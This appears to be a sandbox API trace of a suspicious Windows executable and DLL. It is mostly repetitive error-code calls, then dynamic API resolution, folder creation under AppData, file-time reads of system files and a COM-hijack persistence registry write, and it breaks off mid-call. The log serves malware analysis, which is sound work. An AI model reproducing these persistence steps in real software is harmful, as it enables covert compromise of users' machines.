[0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.100] GetLastError () returned 0x0 [0037.100] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.101] SetLastError (dwErrCode=0x0) [0037.101] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.102] SetLastError (dwErrCode=0x0) [0037.102] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.103] GetLastError () returned 0x0 [0037.103] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.104] SetLastError (dwErrCode=0x0) [0037.104] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.105] GetLastError () returned 0x0 [0037.105] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.106] GetLastError () returned 0x0 [0037.106] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.107] SetLastError (dwErrCode=0x0) [0037.107] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.108] SetLastError (dwErrCode=0x0) [0037.108] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.110] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0037.110] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0037.110] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0037.111] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f6d8 | out: lpSystemTimeAsFileTime=0x26f6d8*(dwLowDateTime=0xe3cd0e30, dwHighDateTime=0x1d3dfba)) [0037.111] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f610, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.111] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f4f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.111] GetLastError () returned 0x0 [0037.112] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.112] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0037.112] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.112] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.112] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.112] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0037.112] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0037.112] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0037.112] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0037.112] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0037.112] GetLastError () returned 0xb7 [0037.112] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0037.112] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0037.112] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0037.112] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0037.112] wsprintfA (in: param_1=0x26f378, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0037.112] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0037.112] wsprintfA (in: param_1=0x26f274, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0037.112] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.113] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0037.113] CloseHandle (hObject=0x74) returned 1 [0037.113] GetLastError () returned 0x0 [0037.113] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0037.113] GetLastError () returned 0x0 [0037.113] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0037.113] GetSystemDirectoryA (in: lpBuffer=0x26f378, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.113] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.113] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0037.113] CloseHandle (hObject=0x74) returned 1 [0037.113] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0037.113] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0037.113] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0037.115] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0037.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0037.115] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0037.115] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0037.115] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0037.115] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0037.115] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0037.115] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0037.115] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0037.116] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0037.117] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0037.117] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0037.117] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0037.117] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0037.117] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0037.117] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0037.118] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0037.118] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0037.118] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0037.118] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0037.118] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0037.118] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0037.118] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.118] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.118] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.118] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0037.118] GetVersionExW (in: lpVersionInformation=0x26f8fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26f8fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0037.118] GetLastError () returned 0x7f [0037.118] SetLastError (dwErrCode=0x7f) [0037.118] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x26f5f0, lpdwDisposition=0x0 | out: phkResult=0x26f5f0*=0x7c, lpdwDisposition=0x0) returned 0x0 [0037.118] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="%Temp%\\IXP000.TMP\"", cbData=0x26 | out: lpData="%Temp%\\IXP000.TMP\"") returned 0x0 [0037.118] GetLastError () returned 0x7f [0037.118] GetLastError () returned 0x7f [0037.118] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, 